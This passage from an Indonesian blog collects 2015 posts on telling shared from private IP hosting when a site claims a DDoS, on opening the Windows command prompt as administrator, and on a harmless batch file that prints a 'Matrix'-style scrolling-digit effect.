Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya karena  memiliki IP yang sama dengan semuabisnis.com .

Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.

Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.

Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.

Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.
Ketik di cmd

PING  situsyangdituju.com  enter

kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )

Demikian Itulah Penjelasan singkat Tentang Apa itu DDOS. Semoga menambah pengetahuan anda
Pengunjung yang baik tinggalkan komentar dan share article ini
terima kasih telah berkunjung

Kamis, 31 Desember 2015

Cara Menjalankan Run As Administrator di Command Prompt (CMD) Masuk Sebagai Admin



        Ada beberapa cara yang cukup mudah untuk menjalankan command prompt sebagai admin atau Run As Administrator.Masuk sebagai admin di cmd untuk mendapatkan akses penuh jika ingin menjalankan perintah untuk masuk ke dalam sistem MS Dos.Sebagai contoh saja :saya mau mengaktifkan hostednetwork dengan menulis code di cmd Netsh Wlan Start HostedNetwork  lalu tekan enter maka akan ada tulisan seperti di gambar :

Caranya masuk sebagai admin yaitu:
1.Pilih Start>Run>atau tekan tombol windows+R Tulis CMD Lalu klik kanan pilih Run As Administrator.
Cara kedua yaitu dengan tekan tombol ctrl+shift tekan enter saat penulisan cmd di Run.
Selamat anda mendapat akses penuh untuk penulisan code Cmd.

Rabu, 30 Desember 2015

Cara membuat Efek code matriks CMD dengan Notepad



    Siapa yang tidak tahu film Matriks,ya film satu memang cukup fenomenal di dunia,karena adegan yang keren dan teknologi CGI yang memukau mata.Dunia digital yang diciptakan oleh robot dan manusia sebagai sumber daya energi.Untuk masuk dan keluar dari dunia tersebut terciptalah Code Matriks yang saat ini sangat populer di kalangan peretas dengan khas warna hijau terang.Untuk sinopsis dan downloadnya silahkan googleling saja.Cara membuat efek matrik kali ini cukup mudah hanya menggunakan notepad saja.Silahkan simak Tutorial membuat Efek Code Matriks H4ck3r dibawah.

Cara:
1.Buka notepad dengan cara klik start ketik di run tulis Notepad lalu tekan enter.
Cmd Matriks efek

Matriks Efek notepad

2.Tulis Code dibawah ini atau di copy paste
@echo off
title H4ck1ng Start
cls
mode 1000
pause

color a
:a 
echo 1 1 1 0 1 0 0 0 1 1 1 1 0 0 0 1 1 0 0 1 0 0 0 1 1 0 1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1  1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
ping localhost -n 1 > nul
echo 1 1 0 1 1 1 0 0 0 1 0 1 a f h 0 0 0 1 0 1 1 0 0 1 1 1 0 0 1 0 1 0 0 1 1 0 2 2 P 2 3 3 2 A S 3 E R 2 3 3 2 3 0 1 0 1 0 1 0 1 0 1 0 1 01 1  1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
echo 1 0 0 1 1 0 9 8 1 2 0 1 9 9 2 1 1 1 0 0 1 0 1 1 1 0 1 1 0 1 0 0 0 1 0 1 1 3 2 W 3 4 2 3 3 4 4 O R D W 1 0 1 0 1 0 1 0 1 0 1 0 1 0 1 0  1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
ping localhost -n 1 > nul 
echo 0 1 0 0 0 1 0 0 0 1 0 0 0 1 0 1 0 0 1 0 1 0 1 1 0 1 0 0 0 01 0 1 0 0 1 0 1 0 2 0 0 1  1 1 1 1 1 1 0 0 0 0 0 0 1 2 0 2 2 3 2 2 1 2 2 3 1 1  1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
ping localhost -n 1 > nul 
echo 1 0 1 1 1 0 1 1 0 9 1 1 2 1 1 0 9 1 0 5 7 7 8 7 8 1 3 2 1 2 1 2 3 2 1 3 4 2 2 1 1 1 0 0 0 0 1 1 1 0 1 0 2 0 1 2 0 0 0 0 1 1 0 0 1 2 0 1 1 1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
ping localhost -n 1 > nul 
echo 1 1 1 0 1 0 0 1 0 0 0 1 1 1 0 0 1 1 1 4 1 2 1 1 2 0 1 0 1 2 2 1 0 1 1 0 1 2 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 0 0 0 0 1 0 0 0 0 0 0 0 0  1 0 1 0 0 0 1 1 1 1 1 0 1 0 1 1 1 0 1 0 1 0 0 2 0 2 3 1 1 1 1 1 0 0 0 0 0 1 0 1 2 1 1
goto a

Hasil edit saya sendiri

3.klik file save as di notepad,simpan file di windows  tulis nama file dengan .bat 
contoh : Matriks.bat
klik save
Silahkan di test dengan cara klik kanan open atau klik file enter
Lalu klik enter lagi untuk memulai.
Next time saya akan share ScreenSaver Matriks yang tulisan jepan atau Rain Matriks Japan Code
Selamat mencoba



Kamis, 17 September 2015

Cara Keren Menggunakan Cmd Windows